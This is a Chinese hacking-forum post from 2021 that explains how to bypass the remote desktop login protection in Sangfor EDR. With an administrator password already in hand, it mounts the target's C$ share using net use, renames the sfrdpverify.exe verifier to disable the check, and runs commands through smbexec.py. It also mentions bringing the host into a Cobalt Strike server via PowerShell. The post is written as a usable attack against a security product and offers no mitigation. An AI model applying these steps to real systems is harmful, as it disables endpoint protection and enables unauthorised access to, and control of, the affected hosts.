查看: 19582|回复: 0

【漏洞利用】深信服EDR远程桌面登录保护绕过

[复制链接]
匿名
匿名  发表于 2021-2-20 17:10:36 |阅读模式
0x01 简述

在某次项目中,通过一些渗透手段拿到了靶标服务器的管理员密码,但是在登陆服务器时,弹出深信服EDR的远程登陆保护界面,要求输入验证密码

微信截图_20210220142413.png

本地搭建深信服EDR,通过对比进程后发现,远程登录保护认证功能是由sfrdpverify进程实现的

路径:
[Shell] 纯文本查看 复制代码
C:\Program Files\Sangfor\EDR\agent\bin\sfrdpverify.exe


并且此文件无权限保护,可进行增删改操作。

0x02 绕过验证

在已知管理员密码的情况下,可通过net use挂载对方C盘

命令:
[Shell] 纯文本查看 复制代码
net use \\192.168.1.1\C$ pass /user:administrator


2.png

对sfrdpverify.exe文件进行删除或改名操作,修改为

[Shell] 纯文本查看 复制代码
C:\Program Files\Sangfor\EDR\agent\bin\sfrdpverify.exe.1


3.png

修改完成后,再次登录远程桌面,即可绕过深信服EDR远程验证保护

4.png

也使用psexec、wmiexec、smbexec等方式进行交互

命令:
[Shell] 纯文本查看 复制代码
python smbexec.py ./user:pass@192.168.1.1


5.png

通过执行powershell命令上线cs服务端后再进行操作

6.png
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

GMT+8, 2024-12-22 10:51 , Processed in 0.029736 second(s), 15 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部